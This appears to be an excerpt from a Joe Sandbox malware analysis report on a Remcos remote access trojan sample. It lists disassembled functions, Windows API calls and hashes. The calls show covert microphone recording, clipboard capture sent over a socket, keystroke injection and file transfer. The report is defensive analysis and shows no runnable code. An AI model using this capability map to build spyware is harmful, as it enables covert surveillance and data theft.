                                                                                                                                                                                                                                            • Instruction ID: c19d1c6df4eaf99de932d1d3e2b79d277c3c3ae54bcdefde962c91a872100eda
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90e70b3c48fc0f521c57fefc4eea8134555d63251f5e005d225ddbf87606e40e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B313E719001085ADB14FBA1DC96EEE7764AF50708F00017FF906730E2EF786A8ACA9D
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _strftime.LIBCMT ref: 00401AD3
                                                                                                                                                                                                                                              • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                                                                                                                                            • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                                                                                                                                                                                            • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                                                                                                                                                                                            • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                                                                                                                                            • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                                                                                                                                                                                            • API String ID: 3809562944-3643129801
                                                                                                                                                                                                                                            • Opcode ID: e0dce4da6f9c26f4323f2fcef848ed48a874295c1d3fb801fba6060ecdae05f5
                                                                                                                                                                                                                                            • Instruction ID: 71dc54c49c3278552d12686eedaa48b86947864de512bb92fe626abde6f710f1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e0dce4da6f9c26f4323f2fcef848ed48a874295c1d3fb801fba6060ecdae05f5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 98317E315053009BC314EF25DC56A9E77E8BB94314F40883EF559A21F1EF78AA49CB9A
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                                                                                                                                                                                            • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                                                                                                                                                                                                            • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                                                                                                                                                                                            • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                                                                                                                                                                                            • waveInStart.WINMM ref: 00401A81
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                                                                                                                                                            • String ID: XCG$`=G$x=G
                                                                                                                                                                                                                                            • API String ID: 1356121797-903574159
                                                                                                                                                                                                                                            • Opcode ID: cbcac788c718bd7f67303107ca832eedb4aafd95f91c6a7e1c6cfce26f1e3068
                                                                                                                                                                                                                                            • Instruction ID: eaefd7a1fab34284b98bc4f49641b1dd71ce781583fbb4b877c049bb372049a4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cbcac788c718bd7f67303107ca832eedb4aafd95f91c6a7e1c6cfce26f1e3068
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A215C316012409BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C998
                                                                                                                                                                                                                                              • Part of subcall function 0041CA2F: RegisterClassExA.USER32(00000030), ref: 0041CA7C
                                                                                                                                                                                                                                              • Part of subcall function 0041CA2F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                                                                                                                                                                                                                                              • Part of subcall function 0041CA2F: GetLastError.KERNEL32 ref: 0041CAA1
                                                                                                                                                                                                                                            • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9CF
                                                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9E9
                                                                                                                                                                                                                                            • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9FF
                                                                                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 0041CA0B
                                                                                                                                                                                                                                            • DispatchMessageA.USER32(?), ref: 0041CA15
                                                                                                                                                                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA22
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                                                                                                                                            • String ID: Remcos
                                                                                                                                                                                                                                            • API String ID: 1970332568-165870891
                                                                                                                                                                                                                                            • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                                                                                                                                            • Instruction ID: a3c1d7bf95fc3ae1ab8e5dc1b7104b29b221ef3087a45b83961503d05de66f2d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 620121B1944348ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: a2fd919219da5dceb4fadf527de6f56cb4df21625ee46edd218c435833ca4f57
                                                                                                                                                                                                                                            • Instruction ID: eb32e44420a9d0dd2d5c4453ebfd120c933f738a1b2f21936dd04ad6d98d905f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a2fd919219da5dceb4fadf527de6f56cb4df21625ee46edd218c435833ca4f57
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6FC1E670D042499FEF11DFADD8417AEBBB4EF4A304F08405AE814A7392C778D941CBA9
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCPInfo.KERNEL32(?,?), ref: 00452BE6
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452C69
                                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00452CA1
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452CFC
                                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00452D4B
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452D13
                                                                                                                                                                                                                                              • Part of subcall function 00446B0F: HeapAlloc.KERNEL32(00000000,00434433,?,?,00437237,?,?,00000000,00475B90,?,0040CC87,00434433,?,?,?,?), ref: 00446B41
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452D8F
                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00452DBA
                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00452DC6
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3256262068-0
                                                                                                                                                                                                                                            • Opcode ID: 5a84a6a5317ae172974df595155495cbc46435c9615446bda379f5f3d343e1a3
                                                                                                                                                                                                                                            • Instruction ID: 924e7ddfc51c8ace49a4e982202af340d06b3b5a9b96f94d8290dca04e209d32
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5a84a6a5317ae172974df595155495cbc46435c9615446bda379f5f3d343e1a3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E691C572E002169BDF218E64CA41AEF7BB5AF0A311F14456BEC01E7243D7ADDC49C7A8
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                            • _memcmp.LIBVCRUNTIME ref: 004446B3
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00444724
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0044473D
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0044476F
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00444778
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00444784
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: _free$ErrorLast$_abort_memcmp
• String ID: C
• API String ID: 1679612858-1037565863
• Opcode ID: 4045a2e03b7b0fda526f0a9e820ad73f36c10bcbe96ad2bd9ebfcc8c6ddf23ea
• Instruction ID: 096df170494440478aae843429242aea5750b14c08813bebb9acd843c79e49b1
• Opcode Fuzzy Hash: 4045a2e03b7b0fda526f0a9e820ad73f36c10bcbe96ad2bd9ebfcc8c6ddf23ea
• Instruction Fuzzy Hash: E8B14A75A012199FEB24DF18C884BAEB7B4FF49314F1085AEE909A7351D739AE90CF44
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID:
• String ID: tcp$udp
• API String ID: 0-3725065008
• Opcode ID: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
• Instruction ID: e5bb8fef491b59a621f975c33c92e719a9e773eef76f1c958f584ffae729cd60
• Opcode Fuzzy Hash: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
• Instruction Fuzzy Hash: 9171AB716083028FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
APIs
• CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
• CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
• MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
• CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
• DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
  • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
  • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
• String ID: .part
• API String ID: 1303771098-3499674018
• Opcode ID: bc587de7adb1460b3aabd07d1d3e6798b8d85c5b62109ba090974b2b68d51c1e
• Instruction ID: 92ff4720e6a7c249f3c3ae71a82c25b1888123647972eaae8327678ea1ca1cb3
• Opcode Fuzzy Hash: bc587de7adb1460b3aabd07d1d3e6798b8d85c5b62109ba090974b2b68d51c1e
• Instruction Fuzzy Hash: 2131C4715083009FD210EF21DD459AFB7A8FB84315F40093FF9C6A21A1DB38AA48CB9A
APIs
  • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
  • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
  • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
  • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
• _wcslen.LIBCMT ref: 0041A906
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: CloseCurrentOpenProcessQueryValue_wcslen
• String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
• API String ID: 37874593-703403762
• Opcode ID: 2d91f4a49e0f0881e5ba5d04f77617b502edbcffc72823e980d0199ecd99e60e
• Instruction ID: 668df6a2f2e8443cbe55da1b88d556a36153785c12b7582e9a7b6ce06fc50c8b
• Opcode Fuzzy Hash: 2d91f4a49e0f0881e5ba5d04f77617b502edbcffc72823e980d0199ecd99e60e
• Instruction Fuzzy Hash: 4C217472B001046BDB04BAB58C96DEE366D9B85358F14093FF412B72D3EE3C9D9942A9
APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042CE63,?,?,?,00449BB1,00000001,00000001,?), ref: 004499BA
• __alloca_probe_16.LIBCMT ref: 004499F2
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042CE63,?,?,?,00449BB1,00000001,00000001,?), ref: 00449A40
• __alloca_probe_16.LIBCMT ref: 00449AD7
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B3A
• __freea.LIBCMT ref: 00449B47
  • Part of subcall function 00446B0F: HeapAlloc.KERNEL32(00000000,00434433,?,?,00437237,?,?,00000000,00475B90,?,0040CC87,00434433,?,?,?,?), ref: 00446B41
• __freea.LIBCMT ref: 00449B50
• __freea.LIBCMT ref: 00449B75
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
• String ID:
• API String ID: 2597970681-0
• Opcode ID: aa8dcda0c36fa9ba79fa8fe966d6c0ac5dcd12a00e8d66bfa7c578b9a9788745
• Instruction ID: 2fc013a73a1c4821613f4f7d6933c77eebbc764427e3f4eacb424f728eff0283
• Opcode Fuzzy Hash: aa8dcda0c36fa9ba79fa8fe966d6c0ac5dcd12a00e8d66bfa7c578b9a9788745
• Instruction Fuzzy Hash: 0951F772610256AFFB259F61DC42EBBB7A9EB44714F14462EFD04D7240EB38EC40E668
APIs
• SendInput.USER32 ref: 00418B18
• SendInput.USER32(00000001,?,0000001C), ref: 00418B40
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B67
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B85
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BA5
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BCA
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BEC
• SendInput.USER32(00000001,?,0000001C), ref: 00418C0F
  • Part of subcall function 00418AC1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AC7
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: InputSend$Virtual
• String ID:
• API String ID: 1167301434-0
• Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
• Instruction ID: 9e9d03405de643faf883966fb0167173931b0bf8c68e8067c58721a0feba7ae1
• Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
• Instruction Fuzzy Hash: 10318071248349AAE210DF65D841FDBFBECAFD9B44F04080FB98457191DBA4998C876B
APIs
• OpenClipboard.USER32 ref: 00415A46
• EmptyClipboard.USER32 ref: 00415A54
• CloseClipboard.USER32 ref: 00415A5A
• OpenClipboard.USER32 ref: 00415A61
• GetClipboardData.USER32(0000000D), ref: 00415A71
• GlobalLock.KERNEL32(00000000), ref: 00415A7A
• GlobalUnlock.KERNEL32(00000000), ref: 00415A83
• CloseClipboard.USER32 ref: 00415A89
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2172192267-0
                                                                                                                                                                                                                                            • Opcode ID: 188954088982c27bf1798ee8bc1fdab4a0b1341d415165718f6a40a7b43e1a5c
                                                                                                                                                                                                                                            • Instruction ID: 21d753e14671b68e74bb0dc0c2a05280281c3050cfaacb3e005a94eaf945824a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 188954088982c27bf1798ee8bc1fdab4a0b1341d415165718f6a40a7b43e1a5c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D0152312083009FC314BB75EC5AAEE77A5AFC0752F41457EFD06861A2DF38C845D65A
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __freea$__alloca_probe_16
                                                                                                                                                                                                                                            • String ID: a/p$am/pm$fD
                                                                                                                                                                                                                                            • API String ID: 3509577899-1143445303
                                                                                                                                                                                                                                            • Opcode ID: ef0e82919ac3b8602debd5a299a6af15dd8aa9f36d72cee99fb0876ec95c8b0f
                                                                                                                                                                                                                                            • Instruction ID: b3ac1812908cceb8a5e393dcdb4c984f4f77018dd86d4d200126c6f407000a93
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ef0e82919ac3b8602debd5a299a6af15dd8aa9f36d72cee99fb0876ec95c8b0f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 45D10171900205EAFB289F68D9456BBB7B0FF06700F26415BE9019B349D37D9D81CB6B
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                                                                            • Opcode ID: 6141bfdb7684140d9b9f029a8ead33158da868342510b0366010e9dcd8c93941
                                                                                                                                                                                                                                            • Instruction ID: 4bbe003d1bf73c874d2a573eb0f11032bb863b1283a960f175a06077317d427c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6141bfdb7684140d9b9f029a8ead33158da868342510b0366010e9dcd8c93941
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D61CE71D00205AFEB20DF69C842BAABBF5EB45320F14407BE844EB281E7759D45CB59
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00446B0F: HeapAlloc.KERNEL32(00000000,00434433,?,?,00437237,?,?,00000000,00475B90,?,0040CC87,00434433,?,?,?,?), ref: 00446B41
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00444096
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 004440AD
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 004440CC
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 004440E7
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 004440FE
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$AllocHeap
                                                                                                                                                                                                                                            • String ID: Z7D
                                                                                                                                                                                                                                            • API String ID: 1835388192-2145146825
                                                                                                                                                                                                                                            • Opcode ID: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                                                                                                                                                                                                            • Instruction ID: 35b293ba1399b13e66314f32d3a1361244e269274da5e60bce22b88c1773d583
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1451D131A00604AFEB20DF66C841B6A77F4EF99724B14456EE909D7251E739EE118B88
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A848,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A115
                                                                                                                                                                                                                                            • __fassign.LIBCMT ref: 0044A190
                                                                                                                                                                                                                                            • __fassign.LIBCMT ref: 0044A1AB
                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1D1
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,00000000,00000000,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A1F0
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A229
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1324828854-0
                                                                                                                                                                                                                                            • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                                                                                                                                            • Instruction ID: e447b7b613fb78ded26f6ec2e5332222395caf0b7731ddcd5a4cfd0c244b89ef
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FB51C270E002499FEB10CFA8D881AEEBBF8FF09310F14416BE955E7351D6749A51CB6A
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 004017F4
                                                                                                                                                                                                                                              • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,00475B90,00475C10,?,0040179E,00475C10), ref: 00433534
                                                                                                                                                                                                                                              • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475C10), ref: 00433571
                                                                                                                                                                                                                                            • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                                                                                                                                                                              • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                                                                                                                                                                              • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475C10,?,004017C1,00475C10,00000000), ref: 004334E9
                                                                                                                                                                                                                                              • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475C10,00000000), ref: 0043351C
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
• String ID: T=G$>G$>G
• API String ID: 1596592924-1617985637
• Opcode ID: 88022268fe3ca53b7ee126a34617c6b967d0ef3f346763fa63774eaa4140af22
• Instruction ID: 0943ace0b6a80c7a2dd7ea0048a529cdefdd5a29547fab9333b46e46416e0a54
• Opcode Fuzzy Hash: 88022268fe3ca53b7ee126a34617c6b967d0ef3f346763fa63774eaa4140af22
• Instruction Fuzzy Hash: D941F0716042008BC325FB75DDA6AAE73A4EB90318F00453FF50AAB1F2DF789985C65E
APIs
• RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
  • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
